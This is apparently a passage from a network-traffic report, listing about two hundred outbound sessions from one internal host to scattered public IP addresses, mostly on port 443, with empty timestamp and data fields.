                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10976192.168.2.153652846.80.104.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10977192.168.2.155039284.210.42.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10978192.168.2.1534178213.70.83.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10979192.168.2.1552162163.224.0.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10980192.168.2.1551966140.116.185.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10981192.168.2.154431097.75.215.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10982192.168.2.1540058134.105.66.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10983192.168.2.1534048150.62.26.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10984192.168.2.155137444.248.255.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10985192.168.2.15528821.70.150.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10986192.168.2.155651864.93.142.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10987192.168.2.154061689.166.142.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10988192.168.2.1560834110.0.208.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10989192.168.2.154319893.104.4.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10990192.168.2.1542788196.157.40.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10991192.168.2.153435048.174.218.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10992192.168.2.155087693.63.123.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10993192.168.2.155548099.33.30.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10994192.168.2.153956480.221.227.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10995192.168.2.1545448186.30.171.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10996192.168.2.155506280.223.151.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10997192.168.2.155814227.20.32.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10998192.168.2.154164077.227.166.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10999192.168.2.1552660116.45.46.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11000192.168.2.155388897.71.120.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11001192.168.2.1541742183.45.104.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11002192.168.2.1536272128.43.145.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11003192.168.2.1534200159.236.227.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11004192.168.2.1550488109.236.9.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11005192.168.2.155404697.166.168.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11006192.168.2.153889432.25.243.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11007192.168.2.1544678173.57.71.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11008192.168.2.1538382111.182.74.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11009192.168.2.1539894143.204.127.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11010192.168.2.1554408158.128.33.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11011192.168.2.1552612179.75.254.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11012192.168.2.154541243.87.125.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11013192.168.2.154924272.217.82.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11014192.168.2.154740020.108.163.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11015192.168.2.153831677.135.80.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11016192.168.2.1555244135.142.131.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11017192.168.2.154038878.58.251.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11018192.168.2.1556714149.210.103.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11019192.168.2.1553576114.78.45.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11020192.168.2.155873650.116.0.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11021192.168.2.155416266.94.77.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11022192.168.2.1546404143.160.71.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11023192.168.2.1546422193.49.79.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11024192.168.2.154989441.55.91.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11025192.168.2.1532886111.207.203.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11026192.168.2.1532830189.38.8.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11027192.168.2.154252450.123.106.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11028192.168.2.153932424.95.205.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11029192.168.2.1543528129.72.123.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11030192.168.2.1551104171.142.175.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11031192.168.2.1533744134.5.13.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11032192.168.2.1555236108.132.74.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11033192.168.2.1542076172.201.121.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11034192.168.2.1542786157.122.157.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11035192.168.2.1558358200.184.161.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11036192.168.2.1537264153.3.113.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11037192.168.2.1558182189.172.227.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11038192.168.2.155407025.212.81.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11039192.168.2.1545576213.223.109.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11040192.168.2.1538760168.156.47.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11041192.168.2.153505813.11.96.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11042192.168.2.1553500148.161.248.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11043192.168.2.155709031.201.109.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11044192.168.2.154355094.15.150.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11045192.168.2.1551118204.84.178.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11046192.168.2.1549794171.35.67.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11047192.168.2.1536736136.40.123.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11048192.168.2.1537570150.37.99.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11049192.168.2.1537476126.158.199.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11050192.168.2.1545788116.162.52.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11051192.168.2.1539382172.67.44.2328080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11052192.168.2.1559944166.157.58.28080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11053192.168.2.155490449.4.91.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11054192.168.2.15490088.88.91.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11055192.168.2.15440745.133.90.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11056192.168.2.1545404114.142.1.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11057192.168.2.1549040110.95.206.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11058192.168.2.153693439.243.177.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11059192.168.2.155028484.104.89.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11060192.168.2.153812044.146.39.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11061192.168.2.1556428131.229.189.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11062192.168.2.153987448.70.206.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11063192.168.2.153635440.163.64.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11064192.168.2.1548408171.245.24.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11065192.168.2.153655083.97.223.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11066192.168.2.154257676.2.91.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11067192.168.2.155061262.247.92.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11068192.168.2.1559316194.141.223.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11069192.168.2.1541768196.220.72.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11070192.168.2.1538788192.224.185.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11071192.168.2.1552220124.58.3.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11072192.168.2.1535532128.228.43.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11073192.168.2.154237647.229.172.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11074192.168.2.156035667.64.50.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11075192.168.2.153954854.153.250.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11076192.168.2.154682850.240.168.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11077192.168.2.154880437.106.220.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11078192.168.2.1555342202.13.129.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11079192.168.2.1558118200.142.34.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11080192.168.2.154113659.236.191.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11081192.168.2.153437070.39.0.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11082192.168.2.1548642191.125.184.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11083192.168.2.1547846124.84.49.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11084192.168.2.1548886201.114.54.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11085192.168.2.153724873.117.194.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11086192.168.2.154528044.16.169.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11087192.168.2.153529658.201.231.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11088192.168.2.1544278222.4.136.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11089192.168.2.1547984163.43.18.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11090192.168.2.154218285.204.33.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11091192.168.2.1549808216.168.168.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11092192.168.2.155461894.58.224.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11093192.168.2.1549288212.110.81.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11094192.168.2.1556466164.17.74.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11095192.168.2.1557126219.81.23.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11096192.168.2.155976895.80.118.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11097192.168.2.1553674184.175.6.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11098192.168.2.153948694.37.235.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11099192.168.2.1543644213.145.125.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11100192.168.2.153816685.184.43.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11101192.168.2.1540820210.17.246.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11102192.168.2.155934086.147.204.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11103192.168.2.1553062165.231.125.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11104192.168.2.1554116183.122.15.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11105192.168.2.155107266.59.108.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11106192.168.2.1538368148.137.104.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11107192.168.2.1539478151.36.49.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11108192.168.2.1543068169.135.225.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11109192.168.2.1555612156.112.218.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11110192.168.2.1533712146.114.123.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11111192.168.2.153717044.62.198.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11112192.168.2.1538776119.252.233.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11113192.168.2.155675872.193.254.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11114192.168.2.1559142123.64.97.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11115192.168.2.1533166153.203.251.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11116192.168.2.1535236169.35.255.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11117192.168.2.155044043.126.241.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11118192.168.2.1553050204.185.177.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11119192.168.2.1540058208.151.82.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11120192.168.2.1539446197.143.17.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11121192.168.2.154276470.34.199.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11122192.168.2.1560334148.140.95.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11123192.168.2.1546102164.61.81.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11124192.168.2.1535804205.66.121.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11125192.168.2.155743848.177.212.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11126192.168.2.1552320217.223.231.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11127192.168.2.153853663.94.43.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11128192.168.2.1545342138.24.86.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11129192.168.2.1548270162.25.44.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11130192.168.2.1551398167.157.11.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11131192.168.2.1553456183.50.55.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11132192.168.2.1540280122.93.226.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11133192.168.2.1553754138.87.174.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11134192.168.2.1558742178.150.30.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11135192.168.2.1552184167.41.123.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11136192.168.2.153620660.61.176.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11137192.168.2.1559116173.107.122.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11138192.168.2.153305661.116.182.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11139192.168.2.1559610157.37.226.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11140192.168.2.1533178181.154.147.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11141192.168.2.15573868.124.172.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11142192.168.2.154554418.119.112.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11143192.168.2.1552534194.67.80.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11144192.168.2.1534270151.157.202.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11145192.168.2.1552946171.234.169.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11146192.168.2.154657044.100.248.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11147192.168.2.1537196191.1.147.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11148192.168.2.1543978185.120.175.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11149192.168.2.1536720148.194.214.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11150192.168.2.1546874176.137.56.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11151192.168.2.1543648149.159.162.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11152192.168.2.1556060104.108.155.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11153192.168.2.1534838164.41.82.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11154192.168.2.1557452100.28.202.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11155192.168.2.153433613.206.128.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11156192.168.2.1544074196.123.205.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11157192.168.2.1548270126.230.244.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11158192.168.2.153815068.103.108.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11159192.168.2.1548278203.220.2.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11160192.168.2.1547462153.206.234.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11161192.168.2.1548396162.97.167.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11162192.168.2.155752678.243.200.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11163192.168.2.1549468160.187.16.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11164192.168.2.1539168145.123.138.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11165192.168.2.155438678.188.172.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11166192.168.2.1537110125.151.89.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11167192.168.2.1548942223.78.235.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11168192.168.2.155338447.55.101.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11169192.168.2.1556408163.23.195.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11170192.168.2.154131458.166.87.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11171192.168.2.154521076.197.101.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11172192.168.2.1533460181.30.61.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11173192.168.2.1549480200.154.227.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11174192.168.2.1550646138.234.217.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11175192.168.2.1551760219.89.104.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11176192.168.2.1559186172.84.254.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11177192.168.2.1559868109.86.176.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11178192.168.2.1539344178.144.233.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11179192.168.2.1560962105.25.114.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11180192.168.2.155548836.133.248.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11181192.168.2.1560156137.248.9.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11182192.168.2.153281652.11.230.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11183192.168.2.1557630140.148.208.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11184192.168.2.155822658.31.43.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11185192.168.2.155771291.157.97.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11186192.168.2.154357647.110.202.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11187192.168.2.1542518115.168.155.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11188192.168.2.155481695.94.173.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11189192.168.2.1540208108.26.235.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11190192.168.2.153697840.115.182.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11191192.168.2.1558258140.78.212.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11192192.168.2.1542412113.134.101.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11193192.168.2.1548274200.21.30.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11194192.168.2.1559884217.204.91.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11195192.168.2.155302620.102.5.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11196192.168.2.1560588201.226.208.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11197192.168.2.1550454104.233.40.14443
